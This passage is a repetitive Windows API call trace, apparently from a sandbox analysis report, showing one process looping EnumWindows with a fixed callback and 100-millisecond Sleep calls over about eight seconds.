(dwMilliseconds=0x64) [0268.499] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.500] Sleep (dwMilliseconds=0x64) [0268.536] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.536] Sleep (dwMilliseconds=0x64) [0268.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.566] Sleep (dwMilliseconds=0x64) [0268.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.580] Sleep (dwMilliseconds=0x64) [0268.616] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.616] Sleep (dwMilliseconds=0x64) [0268.653] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.653] Sleep (dwMilliseconds=0x64) [0268.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.657] Sleep (dwMilliseconds=0x64) [0268.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.694] Sleep (dwMilliseconds=0x64) [0268.733] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.734] Sleep (dwMilliseconds=0x64) [0268.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.741] Sleep (dwMilliseconds=0x64) [0268.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.773] Sleep (dwMilliseconds=0x64) [0268.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.814] Sleep (dwMilliseconds=0x64) [0268.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.833] Sleep (dwMilliseconds=0x64) [0268.854] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.855] Sleep (dwMilliseconds=0x64) [0268.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.968] Sleep (dwMilliseconds=0x64) [0269.008] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.008] Sleep (dwMilliseconds=0x64) [0269.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.012] Sleep (dwMilliseconds=0x64) [0269.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.062] Sleep (dwMilliseconds=0x64) [0269.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.102] Sleep (dwMilliseconds=0x64) [0269.132] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.132] Sleep (dwMilliseconds=0x64) [0269.144] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.144] Sleep (dwMilliseconds=0x64) [0269.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.184] Sleep (dwMilliseconds=0x64) [0269.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.252] Sleep (dwMilliseconds=0x64) [0269.272] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.273] Sleep (dwMilliseconds=0x64) [0269.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.297] Sleep (dwMilliseconds=0x64) [0269.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.336] Sleep (dwMilliseconds=0x64) [0269.388] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.389] Sleep (dwMilliseconds=0x64) [0269.405] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.406] Sleep (dwMilliseconds=0x64) [0269.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.430] Sleep (dwMilliseconds=0x64) [0269.466] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.466] Sleep (dwMilliseconds=0x64) [0269.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.493] Sleep (dwMilliseconds=0x64) [0269.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.506] Sleep (dwMilliseconds=0x64) [0269.543] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.543] Sleep (dwMilliseconds=0x64) [0269.576] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.576] Sleep (dwMilliseconds=0x64) [0269.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.583] Sleep (dwMilliseconds=0x64) [0269.624] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.624] Sleep (dwMilliseconds=0x64) [0269.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.666] Sleep (dwMilliseconds=0x64) [0269.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.700] Sleep (dwMilliseconds=0x64) [0269.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.710] Sleep (dwMilliseconds=0x64) [0269.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.753] Sleep (dwMilliseconds=0x64) [0269.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.794] Sleep (dwMilliseconds=0x64) [0269.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.821] Sleep (dwMilliseconds=0x64) [0269.835] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.836] Sleep (dwMilliseconds=0x64) [0269.875] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.875] Sleep (dwMilliseconds=0x64) [0269.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.915] Sleep (dwMilliseconds=0x64) [0269.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.939] Sleep (dwMilliseconds=0x64) [0269.958] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.958] Sleep (dwMilliseconds=0x64) [0269.995] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0269.995] Sleep (dwMilliseconds=0x64) [0270.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.052] Sleep (dwMilliseconds=0x64) [0270.112] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.112] Sleep (dwMilliseconds=0x64) [0270.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.175] Sleep (dwMilliseconds=0x64) [0270.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.217] Sleep (dwMilliseconds=0x64) [0270.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.232] Sleep (dwMilliseconds=0x64) [0270.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.269] Sleep (dwMilliseconds=0x64) [0270.307] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.307] Sleep (dwMilliseconds=0x64) [0270.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.313] Sleep (dwMilliseconds=0x64) [0270.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.350] Sleep (dwMilliseconds=0x64) [0270.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.397] Sleep (dwMilliseconds=0x64) [0270.412] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.412] Sleep (dwMilliseconds=0x64) [0270.438] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.438] Sleep (dwMilliseconds=0x64) [0270.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.478] Sleep (dwMilliseconds=0x64) [0270.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.513] Sleep (dwMilliseconds=0x64) [0270.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.524] Sleep (dwMilliseconds=0x64) [0270.563] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.563] Sleep (dwMilliseconds=0x64) [0270.602] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.603] Sleep (dwMilliseconds=0x64) [0270.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.629] Sleep (dwMilliseconds=0x64) [0270.658] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.658] Sleep (dwMilliseconds=0x64) [0270.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.696] Sleep (dwMilliseconds=0x64) [0270.736] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.736] Sleep (dwMilliseconds=0x64) [0270.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.759] Sleep (dwMilliseconds=0x64) [0270.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.780] Sleep (dwMilliseconds=0x64) [0270.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.822] Sleep (dwMilliseconds=0x64) [0270.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.867] Sleep (dwMilliseconds=0x64) [0270.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.883] Sleep (dwMilliseconds=0x64) [0270.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.910] Sleep (dwMilliseconds=0x64) [0270.949] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.949] Sleep (dwMilliseconds=0x64) [0270.988] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0270.988] Sleep (dwMilliseconds=0x64) [0271.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.001] Sleep (dwMilliseconds=0x64) [0271.032] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.032] Sleep (dwMilliseconds=0x64) [0271.084] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.084] Sleep (dwMilliseconds=0x64) [0271.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.108] Sleep (dwMilliseconds=0x64) [0271.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.124] Sleep (dwMilliseconds=0x64) [0271.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.164] Sleep (dwMilliseconds=0x64) [0271.230] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.230] Sleep (dwMilliseconds=0x64) [0271.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.335] Sleep (dwMilliseconds=0x64) [0271.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.373] Sleep (dwMilliseconds=0x64) [0271.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.426] Sleep (dwMilliseconds=0x64) [0271.468] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.468] Sleep (dwMilliseconds=0x64) [0271.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.493] Sleep (dwMilliseconds=0x64) [0271.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.513] Sleep (dwMilliseconds=0x64) [0271.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.554] Sleep (dwMilliseconds=0x64) [0271.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.592] Sleep (dwMilliseconds=0x64) [0271.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.596] Sleep (dwMilliseconds=0x64) [0271.641] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.642] Sleep (dwMilliseconds=0x64) [0271.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.687] Sleep (dwMilliseconds=0x64) [0271.730] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.731] Sleep (dwMilliseconds=0x64) [0271.786] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.787] Sleep (dwMilliseconds=0x64) [0271.806] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.806] Sleep (dwMilliseconds=0x64) [0271.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.875] Sleep (dwMilliseconds=0x64) [0271.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.915] Sleep (dwMilliseconds=0x64) [0271.951] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.951] Sleep (dwMilliseconds=0x64) [0271.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0271.964] Sleep (dwMilliseconds=0x64) [0272.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.002] Sleep (dwMilliseconds=0x64) [0272.039] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.040] Sleep (dwMilliseconds=0x64) [0272.065] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.066] Sleep (dwMilliseconds=0x64) [0272.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.098] Sleep (dwMilliseconds=0x64) [0272.137] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.137] Sleep (dwMilliseconds=0x64) [0272.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.182] Sleep (dwMilliseconds=0x64) [0272.194] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.215] Sleep (dwMilliseconds=0x64) [0272.248] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.249] Sleep (dwMilliseconds=0x64) [0272.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.288] Sleep (dwMilliseconds=0x64) [0272.326] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.327] Sleep (dwMilliseconds=0x64) [0272.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.373] Sleep (dwMilliseconds=0x64) [0272.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.419] Sleep (dwMilliseconds=0x64) [0272.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.497] Sleep (dwMilliseconds=0x64) [0272.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.532] Sleep (dwMilliseconds=0x64) [0272.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.540] Sleep (dwMilliseconds=0x64) [0272.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.580] Sleep (dwMilliseconds=0x64) [0272.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.624] Sleep (dwMilliseconds=0x64) [0272.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.655] Sleep (dwMilliseconds=0x64) [0272.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.677] Sleep (dwMilliseconds=0x64) [0272.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.717] Sleep (dwMilliseconds=0x64) [0272.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.757] Sleep (dwMilliseconds=0x64) [0272.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.772] Sleep (dwMilliseconds=0x64) [0272.803] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.804] Sleep (dwMilliseconds=0x64) [0272.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.845] Sleep (dwMilliseconds=0x64) [0272.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.886] Sleep (dwMilliseconds=0x64) [0272.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.896] Sleep (dwMilliseconds=0x64) [0272.931] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.932] Sleep (dwMilliseconds=0x64) [0272.972] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0272.973] Sleep (dwMilliseconds=0x64) [0273.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.013] Sleep (dwMilliseconds=0x64) [0273.020] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.020] Sleep (dwMilliseconds=0x64) [0273.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.069] Sleep (dwMilliseconds=0x64) [0273.113] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.114] Sleep (dwMilliseconds=0x64) [0273.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.155] Sleep (dwMilliseconds=0x64) [0273.162] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.162] Sleep (dwMilliseconds=0x64) [0273.230] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.230] Sleep (dwMilliseconds=0x64) [0273.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.271] Sleep (dwMilliseconds=0x64) [0273.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.280] Sleep (dwMilliseconds=0x64) [0273.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.310] Sleep (dwMilliseconds=0x64) [0273.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.352] Sleep (dwMilliseconds=0x64) [0273.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.390] Sleep (dwMilliseconds=0x64) [0273.409] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.410] Sleep (dwMilliseconds=0x64) [0273.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.449] Sleep (dwMilliseconds=0x64) [0273.496] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.497] Sleep (dwMilliseconds=0x64) [0273.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.537] Sleep (dwMilliseconds=0x64) [0273.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.545] Sleep (dwMilliseconds=0x64) [0273.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.554] Sleep (dwMilliseconds=0x64) [0273.593] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.594] Sleep (dwMilliseconds=0x64) [0273.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.716] Sleep (dwMilliseconds=0x64) [0273.747] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.748] Sleep (dwMilliseconds=0x64) [0273.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.765] Sleep (dwMilliseconds=0x64) [0273.805] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.806] Sleep (dwMilliseconds=0x64) [0273.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.844] Sleep (dwMilliseconds=0x64) [0273.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.858] Sleep (dwMilliseconds=0x64) [0273.925] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.925] Sleep (dwMilliseconds=0x64) [0273.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.967] Sleep (dwMilliseconds=0x64) [0273.972] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0273.972] Sleep (dwMilliseconds=0x64) [0274.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.010] Sleep (dwMilliseconds=0x64) [0274.064] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.064] Sleep (dwMilliseconds=0x64) [0274.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.099] Sleep (dwMilliseconds=0x64) [0274.106] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.107] Sleep (dwMilliseconds=0x64) [0274.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.145] Sleep (dwMilliseconds=0x64) [0274.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.189] Sleep (dwMilliseconds=0x64) [0274.237] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.239] Sleep (dwMilliseconds=0x64) [0274.259] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.259] Sleep (dwMilliseconds=0x64) [0274.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.297] Sleep (dwMilliseconds=0x64) [0274.325] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.326] Sleep (dwMilliseconds=0x64) [0274.337] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.338] Sleep (dwMilliseconds=0x64) [0274.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.378] Sleep (dwMilliseconds=0x64) [0274.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.422] Sleep (dwMilliseconds=0x64) [0274.424] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.424] Sleep (dwMilliseconds=0x64) [0274.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.462] Sleep (dwMilliseconds=0x64) [0274.501] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.501] Sleep (dwMilliseconds=0x64) [0274.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.506] Sleep (dwMilliseconds=0x64) [0274.542] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.543] Sleep (dwMilliseconds=0x64) [0274.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.583] Sleep (dwMilliseconds=0x64) [0274.609] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.610] Sleep (dwMilliseconds=0x64) [0274.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.631] Sleep (dwMilliseconds=0x64) [0274.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.670] Sleep (dwMilliseconds=0x64) [0274.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.710] Sleep (dwMilliseconds=0x64) [0274.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.731] Sleep (dwMilliseconds=0x64) [0274.778] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.779] Sleep (dwMilliseconds=0x64) [0274.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.881] Sleep (dwMilliseconds=0x64) [0274.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.911] Sleep (dwMilliseconds=0x64) [0274.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.927] Sleep (dwMilliseconds=0x64) [0274.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0274.967] Sleep (dwMilliseconds=0x64) [0275.014] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.014] Sleep (dwMilliseconds=0x64) [0275.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.018] Sleep (dwMilliseconds=0x64) [0275.063] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.064] Sleep (dwMilliseconds=0x64) [0275.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.113] Sleep (dwMilliseconds=0x64) [0275.144] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.145] Sleep (dwMilliseconds=0x64) [0275.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.183] Sleep (dwMilliseconds=0x64) [0275.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.225] Sleep (dwMilliseconds=0x64) [0275.247] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.248] Sleep (dwMilliseconds=0x64) [0275.286] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.286] Sleep (dwMilliseconds=0x64) [0275.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.319] Sleep (dwMilliseconds=0x64) [0275.331] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.331] Sleep (dwMilliseconds=0x64) [0275.373] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.374] Sleep (dwMilliseconds=0x64) [0275.413] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.413] Sleep (dwMilliseconds=0x64) [0275.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.415] Sleep (dwMilliseconds=0x64) [0275.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.458] Sleep (dwMilliseconds=0x64) [0275.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.502] Sleep (dwMilliseconds=0x64) [0275.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.513] Sleep (dwMilliseconds=0x64) [0275.543] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.544] Sleep (dwMilliseconds=0x64) [0275.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.581] Sleep (dwMilliseconds=0x64) [0275.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.605] Sleep (dwMilliseconds=0x64) [0275.625] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.626] Sleep (dwMilliseconds=0x64) [0275.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.668] Sleep (dwMilliseconds=0x64) [0275.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.692] Sleep (dwMilliseconds=0x64) [0275.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.709] Sleep (dwMilliseconds=0x64) [0275.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.751] Sleep (dwMilliseconds=0x64) [0275.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.790] Sleep (dwMilliseconds=0x64) [0275.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.800] Sleep (dwMilliseconds=0x64) [0275.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.839] Sleep (dwMilliseconds=0x64) [0275.875] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.875] Sleep (dwMilliseconds=0x64) [0275.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.882] Sleep (dwMilliseconds=0x64) [0275.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.925] Sleep (dwMilliseconds=0x64) [0275.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.961] Sleep (dwMilliseconds=0x64) [0275.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0275.974] Sleep (dwMilliseconds=0x64) [0276.017] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.017] Sleep (dwMilliseconds=0x64) [0276.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.075] Sleep (dwMilliseconds=0x64) [0276.116] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.116] Sleep (dwMilliseconds=0x64) [0276.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.122] Sleep (dwMilliseconds=0x64) [0276.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.165] Sleep (dwMilliseconds=0x64) [0276.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.231] Sleep (dwMilliseconds=0x64) [0276.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.272] Sleep (dwMilliseconds=0x64) [0276.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.283] Sleep (dwMilliseconds=0x64) [0276.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.324] Sleep (dwMilliseconds=0x64) [0276.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.365] Sleep (dwMilliseconds=0x64) [0276.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.392] Sleep (dwMilliseconds=0x64) [0276.407] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.407] Sleep (dwMilliseconds=0x64) [0276.451] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.452] Sleep (dwMilliseconds=0x64) [0276.499] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.500] Sleep (dwMilliseconds=0x64) [0276.518] 